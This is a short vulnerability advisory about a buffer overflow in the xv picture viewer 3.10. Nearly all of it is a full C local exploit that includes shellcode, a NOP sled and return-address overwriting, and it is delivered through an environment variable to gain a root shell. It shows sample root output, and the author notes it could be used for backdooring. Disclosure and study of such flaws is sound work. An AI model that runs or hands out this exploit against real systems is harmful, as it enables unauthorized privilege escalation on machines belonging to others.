|
|
|
|
| |
| There exists a buffer overflow vulnerability in the picture viewing program xv. As far as it is known, version 3.10 is affected by the vulnerability. This is a proof of concept local exploit tested on Slackware [kernel 2.4.20]. |
| |
Credit:
The information has been provided by dodo.
|
| |
Exploit:
/*
Linux x86 "xv" local exploit
author: dodo <dodo@darkwired.org>
tested on: Slackware Linux (2.4.20), `xv` 'version 3.10'
date: 01-08-2003
notes:
could be used for backdooring purposes..
greets to everyone @ #darkwired
thanks to tsunami <tsunami@darkwired.org>
root@comprak:/dodo/edu/xv$ chmod a+s /usr/X11/bin/xv
dodo@comprak:/dodo/edu/xv$ ./dw-bof-xv
sh-2.05b# id
uid=0(root) gid=10(wheel) groups=10(wheel)
usage:
./dw-bof-xv [offset]
Slackware Linux offset: -200
contact:
http://www.darkwired.org/
dodo@darkwired.org
ssl-irc: irc.darkwired.org #darkwired
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#define BSIZE 256
static char shellcode[]=
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
"\xeb\x17\x5e\x89\x76\x08\x31\xc0"
"\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x31\xd2\xcd"
"\x80\xe8\xe4\xff\xff\xff\x2f\x62"
"\x69\x6e\x2f\x73\x68\x58";
unsigned long get_sp(void)
{
__asm__("movl %esp, %eax");
}
int main(int argc, char *argv[])
{
char buffer[BSIZE+64];
unsigned long sp = get_sp(), i;
signed long offset = -200;
if(argc>1) offset = atoi(argv[1]);
sp = sp - offset;
//making our buffer
memset(buffer, 0x90, sizeof(buffer)); //glijbaan
memcpy(buffer+((BSIZE-strlen(shellcode))-16), (char *)&shellcode, strlen(shellcode));
for(
i = BSIZE-8;
(BSIZE-8)+16*sizeof(sp) > i; //putting some return addresses
i+=sizeof(sp)) {
*(long *)&buffer[i] = sp;
}
memset(buffer+sizeof(buffer), 0x0, 1);
if(setenv("DODO", buffer, 1)==-1) return -1;
system("xv -name $DODO");
return 1;
}
|
|
|
|
|
